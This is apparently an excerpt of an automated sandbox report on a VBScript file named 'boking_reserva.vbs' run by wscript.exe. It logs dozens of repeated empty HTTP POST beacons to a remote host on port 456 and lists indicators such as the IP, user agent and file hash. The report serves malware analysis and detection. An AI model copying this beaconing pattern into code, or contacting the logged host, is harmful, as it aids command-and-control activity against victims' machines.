                          Oct 1, 2024 15:21:50.362045050 CEST49740456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:21:50.366997957 CEST45649740185.244.29.74192.168.2.7
                          Oct 1, 2024 15:21:53.473753929 CEST49741456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:21:53.478796959 CEST45649741185.244.29.74192.168.2.7
                          Oct 1, 2024 15:21:53.478904963 CEST49741456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:21:53.479187012 CEST49741456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:21:53.483984947 CEST45649741185.244.29.74192.168.2.7
                          Oct 1, 2024 15:21:55.140837908 CEST45649741185.244.29.74192.168.2.7
                          Oct 1, 2024 15:21:55.140908003 CEST49741456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:21:55.141000032 CEST49741456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:21:55.146033049 CEST45649741185.244.29.74192.168.2.7
                          Oct 1, 2024 15:21:58.255090952 CEST49742456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:21:58.260262966 CEST45649742185.244.29.74192.168.2.7
                          Oct 1, 2024 15:21:58.260363102 CEST49742456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:21:58.260493040 CEST49742456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:21:58.265295982 CEST45649742185.244.29.74192.168.2.7
                          Oct 1, 2024 15:21:59.920164108 CEST45649742185.244.29.74192.168.2.7
                          Oct 1, 2024 15:21:59.920304060 CEST49742456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:21:59.920427084 CEST49742456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:21:59.925251007 CEST45649742185.244.29.74192.168.2.7
                          Oct 1, 2024 15:22:03.019867897 CEST49743456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:22:03.025161982 CEST45649743185.244.29.74192.168.2.7
                          Oct 1, 2024 15:22:03.025290966 CEST49743456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:22:03.025521994 CEST49743456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:22:03.030316114 CEST45649743185.244.29.74192.168.2.7
                          Oct 1, 2024 15:22:04.672424078 CEST45649743185.244.29.74192.168.2.7
                          Oct 1, 2024 15:22:04.672529936 CEST49743456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:22:04.672631979 CEST49743456192.168.2.7185.244.29.74
                          Oct 1, 2024 15:22:04.677419901 CEST45649743185.244.29.74192.168.2.7
                          • 185.244.29.74:456
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.749699185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:17:59.521836996 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.749705185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:18:24.008790016 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.749706185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:18:48.897279978 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.749708185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:19:13.435611010 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.749709185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:19:18.274163008 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.749710185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:19:23.670315981 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.749711185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:19:28.432809114 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.749712185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:19:33.214124918 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.749713185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:19:37.945462942 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.749714185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:19:42.902216911 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.749715185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:19:48.422962904 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.749716185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:19:53.149401903 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.749717185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:19:58.221026897 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.749718185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:02.961849928 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.749719185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:07.695878983 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.749720185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:12.472366095 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.749721185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:17.967408895 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.749722185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:22.744745016 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.749723185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:27.494657993 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.749724185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:32.243328094 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.749725185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:36.992801905 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.749726185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:41.728450060 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.749727185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:46.462950945 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.749728185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:51.228586912 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          24192.168.2.749729185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:20:55.964302063 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          25192.168.2.749730185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:00.728833914 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          26192.168.2.749731185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:05.494246960 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          27192.168.2.749732185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:10.245863914 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          28192.168.2.749733185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:15.009183884 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          29192.168.2.749734185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:19.764291048 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          30192.168.2.749735185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:24.511739969 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          31192.168.2.749736185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:29.427233934 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          32192.168.2.749737185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:34.165790081 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          33192.168.2.749738185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:39.091790915 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          34192.168.2.749739185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:43.837872028 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          35192.168.2.749740185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:48.755170107 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          36192.168.2.749741185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:53.479187012 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          37192.168.2.749742185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:21:58.260493040 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          38192.168.2.749743185.244.29.744565828C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Oct 1, 2024 15:22:03.025521994 CEST226OUTPOST /document HTTP/1.1
                          Accept: */*
                          User-Agent: B81A4609
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          Host: 185.244.29.74:456
                          Content-Length: 0
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Target ID:0
                          Start time:09:17:57
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs"
                          Imagebase:0x7ff7b7ea0000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          No disassembly